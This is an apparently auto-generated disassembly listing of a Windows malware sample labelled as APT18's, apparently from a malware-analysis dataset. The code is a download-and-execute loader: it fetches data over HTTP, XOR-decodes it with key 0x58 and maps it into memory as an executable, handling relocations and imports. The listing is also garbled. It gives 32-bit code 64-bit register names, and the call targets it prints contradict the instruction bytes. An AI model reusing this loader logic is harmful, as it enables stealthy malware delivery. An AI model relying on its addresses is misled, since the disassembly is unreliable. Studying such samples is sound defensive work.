# Opcode extraction for malware analysis
# APT Group: 11 G0026 APT18)
# Malware Hash: 3fe208273288fc4d8db1bf20078d550e321d9bc5b9ab80c93d79d2cb05cbf8c2
# Executable format: Portable Executable (PE)
# Processor: x86
# Creation date: Mon Nov 04 00:28:34 EST 2024
# Format: <Address> | <Bytes> | <Mnemonic> | <Full Instruction>

00401000 | 55 | PUSH | PUSH RBP
00401001 | 8b ec | MOV | MOV EBP,ESP
00401003 | b8 34 90 01 00 | MOV | MOV EAX,0x19034
00401008 | e8 93 08 00 00 | CALL | CALL 0x004018a0
0040100d | 53 | PUSH | PUSH RBX
0040100e | 56 | PUSH | PUSH RSI
0040100f | 57 | PUSH | PUSH RDI
00401010 | 6a 07 | PUSH | PUSH 0x7
00401012 | 59 | POP | POP RCX
00401013 | 33 db | XOR | XOR EBX,EBX
00401015 | 88 5d cc | MOV | MOV byte ptr [RBP + -0x34],BL
00401018 | 33 c0 | XOR | XOR EAX,EAX
0040101a | 8d 7d cd | LEA | LEA EDI,[RBP + -0x33]
0040101d | f3 ab | STOSD.REP | STOSD.REP RDI
0040101f | 53 | PUSH | PUSH RBX
00401020 | 53 | PUSH | PUSH RBX
00401021 | 53 | PUSH | PUSH RBX
00401022 | 66 ab | STOSW | STOSW RDI
00401024 | 53 | PUSH | PUSH RBX
00401025 | 68 a4 20 40 00 | PUSH | PUSH 0x4020a4
0040102a | aa | STOSB | STOSB RDI
0040102b | c7 45 f8 20 00 00 00 | MOV | MOV dword ptr [RBP + -0x8],0x20
00401032 | c7 45 ec 04 00 00 00 | MOV | MOV dword ptr [RBP + -0x14],0x4
00401039 | ff 15 84 20 40 00 | CALL | CALL qword ptr [0x008030c3]
0040103f | 8b f0 | MOV | MOV ESI,EAX
00401041 | 89 75 fc | MOV | MOV dword ptr [RBP + -0x4],ESI
00401044 | 3b f3 | CMP | CMP ESI,EBX
00401046 | 75 07 | JNZ | JNZ 0x0040104f
00401048 | 32 c0 | XOR | XOR AL,AL
0040104a | e9 f2 00 00 00 | JMP | JMP 0x00401141
0040104f | 53 | PUSH | PUSH RBX
00401050 | 53 | PUSH | PUSH RBX
00401051 | 53 | PUSH | PUSH RBX
00401052 | 53 | PUSH | PUSH RBX
00401053 | 68 40 30 40 00 | PUSH | PUSH 0x403040
00401058 | 56 | PUSH | PUSH RSI
00401059 | ff 15 8c 20 40 00 | CALL | CALL qword ptr [0x008030eb]
0040105f | 8b f8 | MOV | MOV EDI,EAX
00401061 | 3b fb | CMP | CMP EDI,EBX
00401063 | 75 09 | JNZ | JNZ 0x0040106e
00401065 | 56 | PUSH | PUSH RSI
00401066 | ff 15 80 20 40 00 | CALL | CALL qword ptr [0x008030ec]
0040106c | eb da | JMP | JMP 0x00401048
0040106e | 8b 35 90 20 40 00 | MOV | MOV ESI,dword ptr [0x00803104]
00401074 | 53 | PUSH | PUSH RBX
00401075 | 8d 45 ec | LEA | LEA EAX,[RBP + -0x14]
00401078 | 50 | PUSH | PUSH RAX
00401079 | 8d 45 f0 | LEA | LEA EAX,[RBP + -0x10]
0040107c | 50 | PUSH | PUSH RAX
0040107d | 68 13 00 00 20 | PUSH | PUSH 0x20000013
00401082 | 57 | PUSH | PUSH RDI
00401083 | ff d6 | CALL | CALL RSI
00401085 | 81 7d f0 c8 00 00 00 | CMP | CMP dword ptr [RBP + -0x10],0xc8
0040108c | 74 10 | JZ | JZ 0x0040109e
0040108e | ff 75 fc | PUSH | PUSH qword ptr [RBP + -0x4]
00401091 | 8b 35 80 20 40 00 | MOV | MOV ESI,dword ptr [0x00803117]
00401097 | ff d6 | CALL | CALL RSI
00401099 | 57 | PUSH | PUSH RDI
0040109a | ff d6 | CALL | CALL RSI
0040109c | eb aa | JMP | JMP 0x00401048
0040109e | 53 | PUSH | PUSH RBX
0040109f | 8d 45 f8 | LEA | LEA EAX,[RBP + -0x8]
004010a2 | 50 | PUSH | PUSH RAX
004010a3 | 8d 45 cc | LEA | LEA EAX,[RBP + -0x34]
004010a6 | 50 | PUSH | PUSH RAX
004010a7 | 6a 05 | PUSH | PUSH 0x5
004010a9 | 57 | PUSH | PUSH RDI
004010aa | ff d6 | CALL | CALL RSI
004010ac | 85 c0 | TEST | TEST EAX,EAX
004010ae | 74 0f | JZ | JZ 0x004010bf
004010b0 | 8d 45 cc | LEA | LEA EAX,[RBP + -0x34]
004010b3 | 50 | PUSH | PUSH RAX
004010b4 | ff 15 38 20 40 00 | CALL | CALL qword ptr [0x008030f2]
004010ba | 59 | POP | POP RCX
004010bb | 8b f0 | MOV | MOV ESI,EAX
004010bd | eb 03 | JMP | JMP 0x004010c2
004010bf | 8b 75 f8 | MOV | MOV ESI,dword ptr [RBP + -0x8]
004010c2 | 68 ff 8f 01 00 | PUSH | PUSH 0x18fff
004010c7 | 8d 85 cd 6f fe ff | LEA | LEA EAX,[RBP + -0x19033]
004010cd | 53 | PUSH | PUSH RBX
004010ce | 50 | PUSH | PUSH RAX
004010cf | 88 9d cc 6f fe ff | MOV | MOV byte ptr [RBP + -0x19034],BL
004010d5 | e8 b8 07 00 00 | CALL | CALL 0x00401892
004010da | 83 c4 0c | ADD | ADD ESP,0xc
004010dd | 39 5d 08 | CMP | CMP dword ptr [RBP + 0x8],EBX
004010e0 | 74 4a | JZ | JZ 0x0040112c
004010e2 | 8d 45 f4 | LEA | LEA EAX,[RBP + -0xc]
004010e5 | 50 | PUSH | PUSH RAX
004010e6 | 68 00 90 01 00 | PUSH | PUSH 0x19000
004010eb | 8d 85 cc 6f fe ff | LEA | LEA EAX,[RBP + -0x19034]
004010f1 | 50 | PUSH | PUSH RAX
004010f2 | 57 | PUSH | PUSH RDI
004010f3 | 89 5d f4 | MOV | MOV dword ptr [RBP + -0xc],EBX
004010f6 | ff 15 88 20 40 00 | CALL | CALL qword ptr [0x00803184]
004010fc | 85 c0 | TEST | TEST EAX,EAX
004010fe | 0f 84 44 ff ff ff | JZ | JZ 0x00401048
00401104 | 8b 4d 0c | MOV | MOV ECX,dword ptr [RBP + 0xc]
00401107 | 8b 45 f4 | MOV | MOV EAX,dword ptr [RBP + -0xc]
0040110a | 8b 09 | MOV | MOV ECX,dword ptr [RCX]
0040110c | 88 9c 05 cc 6f fe ff | MOV | MOV byte ptr [RBP + RAX*0x1 + -0x19034],BL
00401113 | 3b c8 | CMP | CMP ECX,EAX
00401115 | 77 02 | JA | JA 0x00401119
00401117 | 8b c1 | MOV | MOV EAX,ECX
00401119 | 50 | PUSH | PUSH RAX
0040111a | 8d 85 cc 6f fe ff | LEA | LEA EAX,[RBP + -0x19034]
00401120 | 50 | PUSH | PUSH RAX
00401121 | ff 75 08 | PUSH | PUSH qword ptr [RBP + 0x8]
00401124 | e8 63 07 00 00 | CALL | CALL 0x0040188c
00401129 | 83 c4 0c | ADD | ADD ESP,0xc
0040112c | 8b 45 0c | MOV | MOV EAX,dword ptr [RBP + 0xc]
0040112f | 89 30 | MOV | MOV dword ptr [RAX],ESI
00401131 | 8b 35 80 20 40 00 | MOV | MOV ESI,dword ptr [0x008031b7]
00401137 | 57 | PUSH | PUSH RDI
00401138 | ff d6 | CALL | CALL RSI
0040113a | ff 75 fc | PUSH | PUSH qword ptr [RBP + -0x4]
0040113d | ff d6 | CALL | CALL RSI
0040113f | b0 01 | MOV | MOV AL,0x1
00401141 | 5f | POP | POP RDI
00401142 | 5e | POP | POP RSI
00401143 | 5b | POP | POP RBX
00401144 | c9 | LEAVE | LEAVE
00401145 | c3 | RET | RET
00401146 | 55 | PUSH | PUSH RBP
00401147 | 8b ec | MOV | MOV EBP,ESP
00401149 | b8 04 90 01 00 | MOV | MOV EAX,0x19004
0040114e | e8 4d 07 00 00 | CALL | CALL 0x004018a0
00401153 | 68 00 90 01 00 | PUSH | PUSH 0x19000
00401158 | 8d 85 fc 6f fe ff | LEA | LEA EAX,[RBP + -0x19004]
0040115e | 6a 00 | PUSH | PUSH 0x0
00401160 | 50 | PUSH | PUSH RAX
00401161 | e8 2c 07 00 00 | CALL | CALL 0x00401892
00401166 | 8d 45 fc | LEA | LEA EAX,[RBP + -0x4]
00401169 | 50 | PUSH | PUSH RAX
0040116a | 8d 85 fc 6f fe ff | LEA | LEA EAX,[RBP + -0x19004]
00401170 | 50 | PUSH | PUSH RAX
00401171 | e8 8a fe ff ff | CALL | CALL 0x00401000
00401176 | 83 c4 14 | ADD | ADD ESP,0x14
00401179 | 3c 01 | CMP | CMP AL,0x1
0040117b | 75 d6 | JNZ | JNZ 0x00401153
0040117d | 33 d2 | XOR | XOR EDX,EDX
0040117f | 39 55 fc | CMP | CMP dword ptr [RBP + -0x4],EDX
00401182 | 76 1b | JBE | JBE 0x0040119f
00401184 | 8d 8c 15 fc 6f fe ff | LEA | LEA ECX,[RBP + RDX*0x1 + -0x19004]
0040118b | 8a 01 | MOV | MOV AL,byte ptr [RCX]
0040118d | 84 c0 | TEST | TEST AL,AL
0040118f | 74 08 | JZ | JZ 0x00401199
00401191 | 3c 58 | CMP | CMP AL,0x58
00401193 | 74 04 | JZ | JZ 0x00401199
00401195 | 34 58 | XOR | XOR AL,0x58
00401197 | 88 01 | MOV | MOV byte ptr [RCX],AL
00401199 | 42 3b 55 fc | CMP | CMP EDX,dword ptr [RBP + -0x4]
0040119d | 72 e5 | JC | JC 0x00401184
0040119f | 8d 85 fc 6f fe ff | LEA | LEA EAX,[RBP + -0x19004]
004011a5 | 56 | PUSH | PUSH RSI
004011a6 | 50 | PUSH | PUSH RAX
004011a7 | e8 33 03 00 00 | CALL | CALL 0x004014df
004011ac | 8b f0 | MOV | MOV ESI,EAX
004011ae | 59 | POP | POP RCX
004011af | 85 f6 | TEST | TEST ESI,ESI
004011b1 | 74 15 | JZ | JZ 0x004011c8
004011b3 | e8 44 04 00 00 | CALL | CALL 0x004015fc
004011b8 | 6a 00 | PUSH | PUSH 0x0
004011ba | 68 bc 20 40 00 | PUSH | PUSH 0x4020bc
004011bf | ff d0 | CALL | CALL RAX
004011c1 | 59 | POP | POP RCX
004011c2 | 59 | POP | POP RCX
004011c3 | e8 c1 04 00 00 | CALL | CALL 0x00401689
004011c8 | 5e | POP | POP RSI
004011c9 | c9 | LEAVE | LEAVE
004011ca | c3 | RET | RET
004011cb | e8 76 ff ff ff | CALL | CALL 0x00401146
004011d0 | 33 c0 | XOR | XOR EAX,EAX
004011d2 | c2 10 00 | RET | RET 0x10
004011d5 | 55 | PUSH | PUSH RBP
004011d6 | 8b ec | MOV | MOV EBP,ESP
004011d8 | 83 ec 0c | SUB | SUB ESP,0xc
004011db | 8b 45 10 | MOV | MOV EAX,dword ptr [RBP + 0x10]
004011de | 8b 48 04 | MOV | MOV ECX,dword ptr [RAX + 0x4]
004011e1 | 8b 00 | MOV | MOV EAX,dword ptr [RAX]
004011e3 | 83 65 fc 00 | AND | AND dword ptr [RBP + -0x4],0x0
004011e7 | 89 4d f8 | MOV | MOV dword ptr [RBP + -0x8],ECX
004011ea | 0f b7 48 14 | MOVZX | MOVZX ECX,word ptr [RAX + 0x14]
004011ee | 56 | PUSH | PUSH RSI
004011ef | 8d 74 01 28 | LEA | LEA ESI,[RCX + RAX*0x1 + 0x28]
004011f3 | 33 c9 | XOR | XOR ECX,ECX
004011f5 | 66 3b 48 06 | CMP | CMP CX,word ptr [RAX + 0x6]
004011f9 | 73 7b | JNC | JNC 0x00401276
004011fb | 53 | PUSH | PUSH RBX
004011fc | 57 | PUSH | PUSH RDI
004011fd | 8b 3d 10 20 40 00 | MOV | MOV EDI,dword ptr [0x00803213]
00401203 | bb 00 10 00 00 | MOV | MOV EBX,0x1000
00401208 | 8b 06 | MOV | MOV EAX,dword ptr [RSI]
0040120a | 85 c0 | TEST | TEST EAX,EAX
0040120c | 75 2a | JNZ | JNZ 0x00401238
0040120e | 8b 45 0c | MOV | MOV EAX,dword ptr [RBP + 0xc]
00401211 | 8b 40 38 | MOV | MOV EAX,dword ptr [RAX + 0x38]
00401214 | 89 45 f4 | MOV | MOV dword ptr [RBP + -0xc],EAX
00401217 | 85 c0 | TEST | TEST EAX,EAX
00401219 | 7e 45 | JLE | JLE 0x00401260
0040121b | 6a 04 | PUSH | PUSH 0x4
0040121d | 53 | PUSH | PUSH RBX
0040121e | 50 | PUSH | PUSH RAX
0040121f | 8b 46 fc | MOV | MOV EAX,dword ptr [RSI + -0x4]
00401222 | 03 45 f8 | ADD | ADD EAX,dword ptr [RBP + -0x8]
00401225 | 50 | PUSH | PUSH RAX
00401226 | ff d7 | CALL | CALL RDI
00401228 | ff 75 f4 | PUSH | PUSH qword ptr [RBP + -0xc]
0040122b | 89 46 f8 | MOV | MOV dword ptr [RSI + -0x8],EAX
0040122e | 6a 00 | PUSH | PUSH 0x0
00401230 | 50 | PUSH | PUSH RAX
00401231 | e8 5c 06 00 00 | CALL | CALL 0x00401892
00401236 | eb 25 | JMP | JMP 0x0040125d
00401238 | 6a 04 | PUSH | PUSH 0x4
0040123a | 53 | PUSH | PUSH RBX
0040123b | 50 | PUSH | PUSH RAX
0040123c | 8b 46 fc | MOV | MOV EAX,dword ptr [RSI + -0x4]
0040123f | 03 45 f8 | ADD | ADD EAX,dword ptr [RBP + -0x8]
00401242 | 50 | PUSH | PUSH RAX
00401243 | ff d7 | CALL | CALL RDI
00401245 | 8b 4e 04 | MOV | MOV ECX,dword ptr [RSI + 0x4]
00401248 | ff 36 | PUSH | PUSH qword ptr [RSI]
0040124a | 03 4d 08 | ADD | ADD ECX,dword ptr [RBP + 0x8]
0040124d | 89 45 f4 | MOV | MOV dword ptr [RBP + -0xc],EAX
00401250 | 51 | PUSH | PUSH RCX
00401251 | 50 | PUSH | PUSH RAX
00401252 | e8 35 06 00 00 | CALL | CALL 0x0040188c
00401257 | 8b 45 f4 | MOV | MOV EAX,dword ptr [RBP + -0xc]
0040125a | 89 46 f8 | MOV | MOV dword ptr [RSI + -0x8],EAX
0040125d | 83 c4 0c | ADD | ADD ESP,0xc
00401260 | 8b 45 10 | MOV | MOV EAX,dword ptr [RBP + 0x10]
00401263 | 8b 00 | MOV | MOV EAX,dword ptr [RAX]
00401265 | 0f b7 40 06 | MOVZX | MOVZX EAX,word ptr [RAX + 0x6]
00401269 | ff 45 fc | INC | INC dword ptr [RBP + -0x4]
0040126c | 83 c6 28 | ADD | ADD ESI,0x28
0040126f | 39 45 fc | CMP | CMP dword ptr [RBP + -0x4],EAX
00401272 | 7c 94 | JL | JL 0x00401208
00401274 | 5f | POP | POP RDI
00401275 | 5b | POP | POP RBX
00401276 | 5e | POP | POP RSI
00401277 | c9 | LEAVE | LEAVE
00401278 | c3 | RET | RET
00401279 | 55 | PUSH | PUSH RBP
0040127a | 8b ec | MOV | MOV EBP,ESP
0040127c | 51 | PUSH | PUSH RCX
0040127d | 51 | PUSH | PUSH RCX
0040127e | 8b 45 08 | MOV | MOV EAX,dword ptr [RBP + 0x8]
00401281 | 8b 00 | MOV | MOV EAX,dword ptr [RAX]
00401283 | 0f b7 48 14 | MOVZX | MOVZX ECX,word ptr [RAX + 0x14]
00401287 | 83 65 fc 00 | AND | AND dword ptr [RBP + -0x4],0x0
0040128b | 33 d2 | XOR | XOR EDX,EDX
0040128d | 8d 4c 01 18 | LEA | LEA ECX,[RCX + RAX*0x1 + 0x18]
00401291 | 66 3b 50 06 | CMP | CMP DX,word ptr [RAX + 0x6]
00401295 | 0f 83 ac 00 00 00 | JNC | JNC 0x00401347
0040129b | 53 | PUSH | PUSH RBX
0040129c | 56 | PUSH | PUSH RSI
0040129d | 57 | PUSH | PUSH RDI
0040129e | 8d 59 24 | LEA | LEA EBX,[RCX + 0x24]
004012a1 | 8b 33 | MOV | MOV ESI,dword ptr [RBX]
004012a3 | 8b 3b | MOV | MOV EDI,dword ptr [RBX]
004012a5 | 8b ce | MOV | MOV ECX,ESI
004012a7 | c1 e9 1d | SHR | SHR ECX,0x1d
004012aa | c1 ee 1e | SHR | SHR ESI,0x1e
004012ad | 83 e1 01 | AND | AND ECX,0x1
004012b0 | 83 e6 01 | AND | AND ESI,0x1
004012b3 | c1 ef 1f | SHR | SHR EDI,0x1f
004012b6 | f7 03 00 00 00 02 | TEST | TEST dword ptr [RBX],0x2000000
004012bc | 74 13 | JZ | JZ 0x004012d1
004012be | 68 00 40 00 00 | PUSH | PUSH 0x4000
004012c3 | ff 73 ec | PUSH | PUSH qword ptr [RBX + -0x14]
004012c6 | ff 73 e4 | PUSH | PUSH qword ptr [RBX + -0x1c]
004012c9 | ff 15 20 20 40 00 | CALL | CALL qword ptr [0x008032ef]
004012cf | eb 5b | JMP | JMP 0x0040132c
004012d1 | 8d 0c 4e | LEA | LEA ECX,[RSI + RCX*0x2]
004012d4 | 8d 0c 4f | LEA | LEA ECX,[RDI + RCX*0x2]
004012d7 | 8b 3c 8d 20 30 40 00 | MOV | MOV EDI,dword ptr [0x403020 + RCX*0x4]
004012de | 8b 0b | MOV | MOV ECX,dword ptr [RBX]
004012e0 | f7 c1 00 00 00 04 | TEST | TEST ECX,0x4000000
004012e6 | 74 06 | JZ | JZ 0x004012ee
004012e8 | 81 cf 00 02 00 00 | OR | OR EDI,0x200
004012ee | 8b 73 ec | MOV | MOV ESI,dword ptr [RBX + -0x14]
004012f1 | 85 f6 | TEST | TEST ESI,ESI
004012f3 | 75 15 | JNZ | JNZ 0x0040130a
004012f5 | f6 c1 40 | TEST | TEST CL,0x40
004012f8 | 74 05 | JZ | JZ 0x004012ff
004012fa | 8b 70 20 | MOV | MOV ESI,dword ptr [RAX + 0x20]
004012fd | eb 07 | JMP | JMP 0x00401306
004012ff | 84 c9 | TEST | TEST CL,CL
00401301 | 79 29 | JNS | JNS 0x0040132c
00401303 | 8b 70 24 | MOV | MOV ESI,dword ptr [RAX + 0x24]
00401306 | 85 f6 | TEST | TEST ESI,ESI
00401308 | 74 22 | JZ | JZ 0x0040132c
0040130a | 68 c0 20 40 00 | PUSH | PUSH 0x4020c0
0040130f | 68 d0 20 40 00 | PUSH | PUSH 0x4020d0
00401314 | ff 15 04 20 40 00 | CALL | CALL qword ptr [0x0080331e]
0040131a | 50 | PUSH | PUSH RAX
0040131b | ff 15 14 20 40 00 | CALL | CALL qword ptr [0x00803335]
00401321 | 8d 4d f8 | LEA | LEA ECX,[RBP + -0x8]
00401324 | 51 | PUSH | PUSH RCX
00401325 | 57 | PUSH | PUSH RDI
00401326 | 56 | PUSH | PUSH RSI
00401327 | ff 73 e4 | PUSH | PUSH qword ptr [RBX + -0x1c]
0040132a | ff d0 | CALL | CALL RAX
0040132c | 8b 45 08 | MOV | MOV EAX,dword ptr [RBP + 0x8]
0040132f | 8b 00 | MOV | MOV EAX,dword ptr [RAX]
00401331 | 0f b7 48 06 | MOVZX | MOVZX ECX,word ptr [RAX + 0x6]
00401335 | ff 45 fc | INC | INC dword ptr [RBP + -0x4]
00401338 | 83 c3 28 | ADD | ADD EBX,0x28
0040133b | 39 4d fc | CMP | CMP dword ptr [RBP + -0x4],ECX
0040133e | 0f 8c 5d ff ff ff | JL | JL 0x004012a1
00401344 | 5f | POP | POP RDI
00401345 | 5e | POP | POP RSI
00401346 | 5b | POP | POP RBX
00401347 | c9 | LEAVE | LEAVE
00401348 | c3 | RET | RET
00401349 | 55 | PUSH | PUSH RBP
0040134a | 8b ec | MOV | MOV EBP,ESP
0040134c | 51 | PUSH | PUSH RCX
0040134d | 56 | PUSH | PUSH RSI
0040134e | 8b 70 04 | MOV | MOV ESI,dword ptr [RAX + 0x4]
00401351 | 8b 00 | MOV | MOV EAX,dword ptr [RAX]
00401353 | 83 b8 a4 00 00 00 00 | CMP | CMP dword ptr [RAX + 0xa4],0x0
0040135a | 76 65 | JBE | JBE 0x004013c1
0040135c | 8b 80 a0 00 00 00 | MOV | MOV EAX,dword ptr [RAX + 0xa0]
00401362 | 03 c6 | ADD | ADD EAX,ESI
00401364 | 8b 08 | MOV | MOV ECX,dword ptr [RAX]
00401366 | 85 c9 | TEST | TEST ECX,ECX
00401368 | 74 57 | JZ | JZ 0x004013c1
0040136a | 53 | PUSH | PUSH RBX
0040136b | 57 | PUSH | PUSH RDI
0040136c | 83 65 fc 00 | AND | AND dword ptr [RBP + -0x4],0x0
00401370 | 8d 3c 31 | LEA | LEA EDI,[RCX + RSI*0x1]
00401373 | 8b 48 04 | MOV | MOV ECX,dword ptr [RAX + 0x4]
00401376 | 83 e9 08 | SUB | SUB ECX,0x8
00401379 | 8d 50 08 | LEA | LEA EDX,[RAX + 0x8]
0040137c | f7 c1 fe ff ff ff | TEST | TEST ECX,0xfffffffe
00401382 | 76 32 | JBE | JBE 0x004013b6
00401384 | 0f b7 0a | MOVZX | MOVZX ECX,word ptr [RDX]
00401387 | 8b d9 | MOV | MOV EBX,ECX
00401389 | 81 e3 00 f0 ff ff | AND | AND EBX,0xfffff000
0040138f | 81 fb 00 30 00 00 | CMP | CMP EBX,0x3000
00401395 | 75 0c | JNZ | JNZ 0x004013a3
00401397 | 8b 5d 08 | MOV | MOV EBX,dword ptr [RBP + 0x8]
0040139a | 81 e1 ff 0f 00 00 | AND | AND ECX,0xfff
004013a0 | 01 1c 39 | ADD | ADD dword ptr [RCX + RDI*0x1],EBX
004013a3 | 8b 48 04 | MOV | MOV ECX,dword ptr [RAX + 0x4]
004013a6 | ff 45 fc | INC | INC dword ptr [RBP + -0x4]
004013a9 | 83 e9 08 | SUB | SUB ECX,0x8
004013ac | d1 e9 | SHR | SHR ECX,0x1
004013ae | 83 c2 02 | ADD | ADD EDX,0x2
004013b1 | 39 4d fc | CMP | CMP dword ptr [RBP + -0x4],ECX
004013b4 | 72 ce | JC | JC 0x00401384
004013b6 | 03 40 04 | ADD | ADD EAX,dword ptr [RAX + 0x4]
004013b9 | 8b 08 | MOV | MOV ECX,dword ptr [RAX]
004013bb | 85 c9 | TEST | TEST ECX,ECX
004013bd | 75 ad | JNZ | JNZ 0x0040136c
004013bf | 5f | POP | POP RDI
004013c0 | 5b | POP | POP RBX
004013c1 | 5e | POP | POP RSI
004013c2 | c9 | LEAVE | LEAVE
004013c3 | c3 | RET | RET
004013c4 | 55 | PUSH | PUSH RBP
004013c5 | 8b ec | MOV | MOV EBP,ESP
004013c7 | 83 ec 10 | SUB | SUB ESP,0x10
004013ca | 8b 07 | MOV | MOV EAX,dword ptr [RDI]
004013cc | 83 b8 84 00 00 00 00 | CMP | CMP dword ptr [RAX + 0x84],0x0
004013d3 | 53 | PUSH | PUSH RBX
004013d4 | 8b 5f 04 | MOV | MOV EBX,dword ptr [RDI + 0x4]
004013d7 | c7 45 f4 01 00 00 00 | MOV | MOV dword ptr [RBP + -0xc],0x1
004013de | 0f 86 f5 00 00 00 | JBE | JBE 0x004014d9
004013e4 | 56 | PUSH | PUSH RSI
004013e5 | 8b b0 80 00 00 00 | MOV | MOV ESI,dword ptr [RAX + 0x80]
004013eb | 6a 14 | PUSH | PUSH 0x14
004013ed | 03 f3 | ADD | ADD ESI,EBX
004013ef | 56 | PUSH | PUSH RSI
004013f0 | ff 15 28 20 40 00 | CALL | CALL qword ptr [0x0080341e]
004013f6 | 85 c0 | TEST | TEST EAX,EAX
004013f8 | 0f 85 da 00 00 00 | JNZ | JNZ 0x004014d8
004013fe | 83 c6 10 | ADD | ADD ESI,0x10
00401401 | 89 75 f8 | MOV | MOV dword ptr [RBP + -0x8],ESI
00401404 | eb 03 | JMP | JMP 0x00401409
00401406 | 8b 75 f8 | MOV | MOV ESI,dword ptr [RBP + -0x8]
00401409 | 8b 46 fc | MOV | MOV EAX,dword ptr [RSI + -0x4]
0040140c | 85 c0 | TEST | TEST EAX,EAX
0040140e | 0f 84 c4 00 00 00 | JZ | JZ 0x004014d8
00401414 | 03 c3 | ADD | ADD EAX,EBX
00401416 | 50 | PUSH | PUSH RAX
00401417 | ff 15 04 20 40 00 | CALL | CALL qword ptr [0x00803421]
0040141d | 89 45 f0 | MOV | MOV dword ptr [RBP + -0x10],EAX
00401420 | 85 c0 | TEST | TEST EAX,EAX
00401422 | 0f 84 ac 00 00 00 | JZ | JZ 0x004014d4
00401428 | 8b 47 0c | MOV | MOV EAX,dword ptr [RDI + 0xc]
0040142b | 8d 04 85 04 00 00 00 | LEA | LEA EAX,[0x4 + RAX*0x4]
00401432 | 50 | PUSH | PUSH RAX
00401433 | ff 77 08 | PUSH | PUSH qword ptr [RDI + 0x8]
00401436 | ff 15 44 20 40 00 | CALL | CALL qword ptr [0x00803480]
0040143c | 59 | POP | POP RCX
0040143d | 59 | POP | POP RCX
0040143e | 89 47 08 | MOV | MOV dword ptr [RDI + 0x8],EAX
00401441 | 85 c0 | TEST | TEST EAX,EAX
00401443 | 0f 84 8b 00 00 00 | JZ | JZ 0x004014d4
00401449 | 8b 4f 0c | MOV | MOV ECX,dword ptr [RDI + 0xc]
0040144c | 8b 55 f0 | MOV | MOV EDX,dword ptr [RBP + -0x10]
0040144f | 89 14 88 | MOV | MOV dword ptr [RAX + RCX*0x4],EDX
00401452 | ff 47 0c | INC | INC dword ptr [RDI + 0xc]
00401455 | 8b 46 f0 | MOV | MOV EAX,dword ptr [RSI + -0x10]
00401458 | 85 c0 | TEST | TEST EAX,EAX
0040145a | 74 0c | JZ | JZ 0x00401468
0040145c | 8d 34 18 | LEA | LEA ESI,[RAX + RBX*0x1]
0040145f | 8b 45 f8 | MOV | MOV EAX,dword ptr [RBP + -0x8]
00401462 | 8b 08 | MOV | MOV ECX,dword ptr [RAX]
00401464 | 03 cb | ADD | ADD ECX,EBX
00401466 | eb 06 | JMP | JMP 0x0040146e
00401468 | 8b 36 | MOV | MOV ESI,dword ptr [RSI]
0040146a | 03 f3 | ADD | ADD ESI,EBX
0040146c | 8b ce | MOV | MOV ECX,ESI
0040146e | 8b 06 | MOV | MOV EAX,dword ptr [RSI]
00401470 | 85 c0 | TEST | TEST EAX,EAX
00401472 | 74 3d | JZ | JZ 0x004014b1
00401474 | 89 4d fc | MOV | MOV dword ptr [RBP + -0x4],ECX
00401477 | 29 75 fc | SUB | SUB dword ptr [RBP + -0x4],ESI
0040147a | 85 c0 | TEST | TEST EAX,EAX
0040147c | 79 07 | JNS | JNS 0x00401485
0040147e | 25 ff ff 00 00 | AND | AND EAX,0xffff
00401483 | eb 05 | JMP | JMP 0x0040148a
00401485 | 03 c3 | ADD | ADD EAX,EBX
00401487 | 83 c0 02 | ADD | ADD EAX,0x2
0040148a | 50 | PUSH | PUSH RAX
0040148b | ff 75 f0 | PUSH | PUSH qword ptr [RBP + -0x10]
0040148e | ff 15 14 20 40 00 | CALL | CALL qword ptr [0x008034a8]
00401494 | 8b 4d fc | MOV | MOV ECX,dword ptr [RBP + -0x4]
00401497 | 89 04 31 | MOV | MOV dword ptr [RCX + RSI*0x1],EAX
0040149a | 8b c1 | MOV | MOV EAX,ECX
0040149c | 83 3c 30 00 | CMP | CMP dword ptr [RAX + RSI*0x1],0x0
004014a0 | 74 0b | JZ | JZ 0x004014ad
004014a2 | 83 c6 04 | ADD | ADD ESI,0x4
004014a5 | 8b 06 | MOV | MOV EAX,dword ptr [RSI]
004014a7 | 85 c0 | TEST | TEST EAX,EAX
004014a9 | 75 d1 | JNZ | JNZ 0x0040147c
004014ab | eb 04 | JMP | JMP 0x004014b1
004014ad | 83 65 f4 00 | AND | AND dword ptr [RBP + -0xc],0x0
004014b1 | 83 7d f4 00 | CMP | CMP dword ptr [RBP + -0xc],0x0
004014b5 | 74 21 | JZ | JZ 0x004014d8
004014b7 | 83 45 f8 14 | ADD | ADD dword ptr [RBP + -0x8],0x14
004014bb | 8b 45 f8 | MOV | MOV EAX,dword ptr [RBP + -0x8]
004014be | 6a 14 | PUSH | PUSH 0x14
004014c0 | 83 c0 f0 | ADD | ADD EAX,-0x10
004014c3 | 50 | PUSH | PUSH RAX
004014c4 | ff 15 28 20 40 00 | CALL | CALL qword ptr [0x008034f2]
004014ca | 85 c0 | TEST | TEST EAX,EAX
004014cc | 0f 84 34 ff ff ff | JZ | JZ 0x00401406
004014d2 | eb 04 | JMP | JMP 0x004014d8
004014d4 | 83 65 f4 00 | AND | AND dword ptr [RBP + -0xc],0x0
004014d8 | 5e | POP | POP RSI
004014d9 | 8b 45 f4 | MOV | MOV EAX,dword ptr [RBP + -0xc]
004014dc | 5b | POP | POP RBX
004014dd | c9 | LEAVE | LEAVE
004014de | c3 | RET | RET
004014df | 55 | PUSH | PUSH RBP
004014e0 | 8b ec | MOV | MOV EBP,ESP
004014e2 | 51 | PUSH | PUSH RCX
004014e3 | 51 | PUSH | PUSH RCX
004014e4 | 8b 45 08 | MOV | MOV EAX,dword ptr [RBP + 0x8]
004014e7 | b9 4d 5a 00 00 | MOV | MOV ECX,0x5a4d
004014ec | 66 39 08 | CMP | CMP word ptr [RAX],CX
004014ef | 74 04 | JZ | JZ 0x004014f5
004014f1 | 33 c0 | XOR | XOR EAX,EAX
004014f3 | c9 | LEAVE | LEAVE
004014f4 | c3 | RET | RET
004014f5 | 53 | PUSH | PUSH RBX
004014f6 | 8b 58 3c | MOV | MOV EBX,dword ptr [RAX + 0x3c]
004014f9 | 03 d8 | ADD | ADD EBX,EAX
004014fb | 81 3b 50 45 00 00 | CMP | CMP dword ptr [RBX],0x4550
00401501 | 74 07 | JZ | JZ 0x0040150a
00401503 | 33 c0 | XOR | XOR EAX,EAX
00401505 | e9 ef 00 00 00 | JMP | JMP 0x004015f9
0040150a | 56 | PUSH | PUSH RSI
0040150b | 8b 35 10 20 40 00 | MOV | MOV ESI,dword ptr [0x00803521]
00401511 | 57 | PUSH | PUSH RDI
00401512 | 6a 04 | PUSH | PUSH 0x4
00401514 | bf 00 20 00 00 | MOV | MOV EDI,0x2000
00401519 | 57 | PUSH | PUSH RDI
